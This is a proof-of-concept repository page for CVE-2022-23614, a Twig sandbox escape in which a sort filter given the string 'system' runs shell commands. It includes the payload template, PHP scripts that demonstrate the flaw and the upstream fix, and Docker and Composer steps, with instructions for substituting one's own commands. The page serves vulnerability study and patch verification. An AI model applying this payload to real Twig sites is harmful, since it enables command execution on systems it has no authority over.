
CVE-2022-23614 PoC — Sensio Labs Twig code injection vulnerability

Associated Vulnerability
Title: Sensio Labs Twig code injection vulnerability (CVE-2022-23614)
Description: Sensio Labs Twig is a PHP template engine from the French company Sensio Labs; it supports custom tags and filters and can be used to build DSLs. Sensio Labs Twig has a code injection vulnerability: in sandbox mode, the `arrow` parameter of the `sort` filter must be a closure so that an attacker cannot use it to run arbitrary PHP functions. In affected versions this constraint was not properly enforced, which can lead to injection of arbitrary PHP code.
Description
Proof of concept for CVE-2022-23614 (code injection in Twig's sandbox mode, demonstrated here as command execution through `system`)
Readme
# CVE-2022-23614

Proof of concept (PoC) for [CVE-2022-23614](https://nvd.nist.gov/vuln/detail/CVE-2022-23614) referenced in the [DSA-5107-1](https://www.debian.org/security/2022/dsa-5107).

- **CVSS-2.0**: 7.5
- **CVSS-3.X**: 9.8

## Explanation

Twig is a flexible, fast, and secure template engine for PHP. Templates can pass values through filters before they are rendered. The `sort` filter sorts the elements of an array and, since Twig 2.12, accepts an optional arrow function as a custom comparator (its `arrow` parameter):

```twig
{# ascending by default; the arrow function below reverses the order #}
{{ [5,8,2,3]|sort((a, b) => b <=> a) }}
```

Twig has a sandbox mode for evaluating untrusted template code under a `SecurityPolicy` that whitelists tags, filters, functions, methods and properties by name. The `arrow` argument of `sort` is, however, an ordinary filter argument that ends up as the comparator handed to PHP's `uasort()`; in sandbox mode it must therefore be a closure, otherwise an attacker can name any PHP function and have it called with the array elements as its arguments. In affected versions this constraint was not enforced, which leads to execution of arbitrary PHP code. The template below calls `system("id", "")`, because `uasort()` invokes the comparator with pairs of elements and the first element is the command:

```twig
{{ ["id",""]|sort('system') }}
```
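The following script is an added example for this page, not code from the PoC repository or from Twig. It renders the payload above inside a deliberately strict sandboxed environment to show why the sandbox policy alone does not stop it: the policy only ever sees the filter name `sort`, never the string `system`. It assumes `twig/twig` was installed with Composer in the current directory (`vendor/autoload.php`); the template names and the policy contents are choices made for this example. Upstream fixed the issue in Twig 2.14.11 and 3.3.8.

```php
<?php
// Added example (not part of the PoC repository or Twig): render the README's
// payload inside a *sandboxed* Twig environment. Assumes twig/twig is installed
// via Composer next to this file; template names and policy are this example's own.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\RuntimeError;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;

// Deliberately strict policy: no tags, no functions, no methods/properties,
// and only two filters. "system" is never granted anywhere.
$policy = new SecurityPolicy(
    [],               // allowed tags
    ['sort', 'join'], // allowed filters
    [],               // allowed methods
    [],               // allowed properties
    []                // allowed functions
);

$templates = [
    // The README's payload: the arrow argument is a *string* naming a PHP
    // function. The policy never inspects it, because it is an ordinary
    // filter argument, not a filter or function name.
    'untrusted' => "{{ args|sort('system') }}",
    // A legitimate template: a real arrow function as comparator (Twig >= 2.12).
    // Fixed versions accept this because Twig compiles it to a Closure.
    'legit'     => "{{ args|sort((a, b) => a <=> b)|join(',') }}",
];

$twig = new Environment(new ArrayLoader($templates));
// Second argument true: every template is rendered in sandbox mode, so the
// "arrow must be a Closure" requirement of fixed versions applies.
$twig->addExtension(new SandboxExtension($policy, true));

printf("twig/twig %s\n", Environment::VERSION);

foreach (['untrusted' => ['id', ''], 'legit' => [3, 1, 2]] as $name => $args) {
    printf("--- %s ---\n", $name);
    try {
        // uasort() calls the comparator with pairs of elements, so for
        // "untrusted" a vulnerable build ends up calling system('id', ''):
        // the first element is the command, the second merely pads the call
        // (PHP warns that it should be a reference but still performs it).
        echo $twig->render($name, ['args' => $args]), "\n";
    } catch (SecurityError $e) {
        // Raised only when the policy rejects a tag/filter/function by name.
        echo 'blocked by SecurityPolicy: ', $e->getMessage(), "\n";
    } catch (RuntimeError $e) {
        // Fixed releases (2.14.11 / 3.3.8 and later) reject a non-Closure
        // arrow in sandbox mode before uasort() is ever reached.
        echo 'rejected at runtime: ', $e->getMessage(), "\n";
    }
}
```

Run it with `php sandbox_poc.php` against a vulnerable and a fixed `twig/twig` and compare: on the vulnerable build the `untrusted` template prints the output of `id` despite the sandbox, on the fixed build it is rejected with a runtime error, and the `legit` template renders `1,2,3` in both cases.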

## Usage

This PoC illustrates the vulnerability in two different setups: either using the Debian `php-twig` package (v2.14.1) or using the Composer `twig/twig` package (v2.14).

The `index.php` file crafts a Twig template based on the first argument. In the following code, `argv[1]` is the name of the sorting function that will be used by Twig when rendering.

```php
// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";
```

Then, `index.php` uses two deprecated Twig functions to load the generated template. Finally, it uses the second argument (`argv[2]`), a JSON object, to pass data to the template as it is rendered, notably the `args` array that we want to sort.

```php
// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);
```

The rendered template is then printed in the standard output.
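To make the root cause and the fix tangible without a Twig installation, the script below is an added example written for this page: a stand-alone PHP reimplementation of the core of the `sort` filter, once as the affected code and once with the kind of guard the patch commit listed under References introduces. It is modelled on that commit but is not Twig's code; the function names (`sortFilterVulnerable`, `sortFilter`, `checkArrowInSandbox`, `fake_system`) and the error message wording are this example's own, and `fake_system` is a harmless stand-in that records the command instead of executing it.

```php
<?php
// Added example, written for this page (not Twig's source): the sort filter's
// core before and after the guard the upstream fix adds. All names here are
// this example's own; fake_system() stands in for system() and only records.
declare(strict_types=1);

/** Affected behaviour: whatever PHP callable arrives is handed to uasort(). */
function sortFilterVulnerable(bool $sandboxed, array $array, $arrow = null): array
{
    if ($arrow !== null) {
        uasort($array, $arrow);   // $arrow may be the string 'system'
    } else {
        asort($array);
    }
    return $array;
}

/**
 * The guard: in sandbox mode only a Closure (what Twig compiles an arrow
 * function to) is acceptable; a string or [object, 'method'] callable is not.
 */
function checkArrowInSandbox(bool $sandboxed, $arrow, string $filter): void
{
    if ($sandboxed && !$arrow instanceof \Closure) {
        throw new RuntimeException(sprintf(
            'The callable passed to the "%s" filter must be a Closure in sandbox mode.',
            $filter
        ));
    }
}

/** Fixed behaviour: identical to the vulnerable version except for the guard. */
function sortFilter(bool $sandboxed, array $array, $arrow = null): array
{
    if ($arrow !== null) {
        checkArrowInSandbox($sandboxed, $arrow, 'sort');
        uasort($array, $arrow);
    } else {
        asort($array);
    }
    return $array;
}

/** Stand-in for system(): same argument shape, but it only records the command. */
function fake_system(string $command, $unused = null): int
{
    $GLOBALS['executed'][] = $command;
    return 0;
}

$GLOBALS['executed'] = [];
$payload = ['id', ''];   // the README's {"args":["id",""]}

// 1. Affected code, sandboxed: the string callable reaches uasort() anyway,
//    which calls fake_system('id', '') exactly as it would call system().
sortFilterVulnerable(true, $payload, 'fake_system');
printf("vulnerable: callable ran with command '%s'\n", implode(' ', $GLOBALS['executed']));

// 2. Fixed code, sandboxed: rejected before any callable is invoked.
try {
    sortFilter(true, $payload, 'fake_system');
} catch (RuntimeException $e) {
    printf("fixed: %s\n", $e->getMessage());
}

// 3. Fixed code, sandboxed, a real arrow function: still allowed.
print_r(sortFilter(true, [3, 1, 2], static fn ($a, $b) => $a <=> $b));

// 4. Outside the sandbox (trusted templates) string callables remain legal.
print_r(sortFilter(false, ['b', 'a'], 'strcmp'));
```

The point of case 1 versus case 2 is that the sandbox flag was already known to the filter in affected versions; what was missing was any check on the type of the comparator. Case 4 shows why the check is tied to sandbox mode rather than applied unconditionally: outside the sandbox, templates are trusted and a named PHP function is a legitimate comparator.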

> Please note this repository was made for **demonstration purposes only**. It is meant to be simple to understand and easy to use in order to play with the CVE using only a command line interface. It is quite far from what one can find on an actual vulnerable server.

### php-twig

Using Docker, we are able to recreate the context of the original [Debian Security Advisory (DSA)](https://www.debian.org/security/2022/dsa-5107). You can use the provided `build-docker.sh` script in order to properly build and run the vulnerable container.

```
chmod a+x build-docker.sh
./build-docker.sh
```

The container should shut down once the payload is executed (an `id` command). If you want to try your own commands, you can run the container in interactive mode:

```
docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash
```

Once in the container, you can craft your own payload using the following model:

```
php index.php system '{"args":["id",""]}'
                ^                 ^
          sorting function   array to sort
```

> This dockerfile was partially created using [DECRET](https://github.com/Orange-OpenSource/decret).

### Composer

If you have PHP and Composer already installed on your machine, you can replicate the exploit using the vulnerable Composer package.

```
cd exploit
composer install
```

Then you just have to play with the payload.

```
php index.php system '{"args":["id",""]}'
```

---

## References

**CVE details**: https://nvd.nist.gov/vuln/detail/CVE-2022-23614

**DSA**: https://www.debian.org/security/2022/dsa-5107

**Patch commit**: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9

**PoC by davwwwx** (using GUI): https://github.com/davwwwx/CVE-2022-23614
File Snapshot

```
[4.0K] /data/pocs/8051fce50292fce7f1634c7d7680d17df6f1cbbd
├── [ 101] build-docker.sh
├── [ 697] Dockerfile
├── [4.0K] exploit
│   ├── [ 181] composer.json
│   ├── [8.7K] composer.lock
│   └── [1.4K] index.php
├── [3.4K] README.md
└── [ 231] snapshot.list

1 directory, 7 files
```